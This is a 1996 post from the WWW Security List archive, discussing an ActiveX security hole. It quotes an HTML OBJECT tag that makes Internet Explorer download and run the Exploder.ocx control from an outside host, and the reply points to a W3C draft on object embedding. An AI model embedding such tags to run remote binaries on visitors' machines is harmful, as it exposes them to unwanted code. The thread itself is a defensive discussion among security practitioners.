[2603] in WWW Security List Archive
Re: ActiveX security hole reported.
daemon@ATHENA.MIT.EDU (Scott Sesher)
Tue Aug 13 12:28:06 1996
From: sas@mail.pittstate.edu (Scott Sesher)
To: CHESS@watson.ibm.com (David M. Chess)
Date: Tue, 13 Aug 1996 08:35:48 -0500 (CDT)
Cc: www-security@ns2.rutgers.edu
In-Reply-To: <199608121759.NAA89585@mailhub1.watson.ibm.com> from "David M. Chess" at Aug 12, 96 01:52:06 pm
Errors-To: owner-www-security@ns2.rutgers.edu
...stuff deleted ...
>
> This stuff, though:
>
> <A HREF="http://home.netscape.com/comprod/mirror/index.html">
> <OBJECT ID="Exploder1" WIDTH=86 HEIGHT=31
> CODEBASE="http://www.halcyon.com/mclain/ActiveX/Exploder.ocx"
> CLASSID="CLSID:DE70D9E3-C55A-11CF-8E43-780C02C10128">
> <PARAM NAME="_Version" VALUE="65536">
> <PARAM NAME="_ExtentX" VALUE="2646">
> <PARAM NAME="_ExtentY" VALUE="1323">
> <PARAM NAME="_StockProps" VALUE="0">
> <IMG SRC="../../images/now20_button.gif" WIDTH=88 HEIGHT=31></OBJECT></A>
>
> is new to me. It seems to be instructing IE to download
> the Exploder.ocx binary, and run it (after giving the user
> some little popup warnings to make sure he didn't click
> by accident). Does anyone have a pointer to the semantics
> of this sort of <OBJECT> tag?
>
> - -- -
> David M. Chess | Remember:
> High Integrity Computing Lab | it's your pineal gland,
> IBM Watson Research | but it's their antenna!
>
Check out the W3C Working Draft "Inserting Objects into HTML"
http://www.w3.org/pub/WWW/TR/WD-object
- sas
------------------------------------------------------------------------
"The last thing I want to do is deal | Scott Sesher, Sys Admin
with a bunch of people who want something." | Pittsburg State University
| sas@pittstate.edu
Major Major | Talk Net: (316)-235-4606
------------------------------------------------------------------------
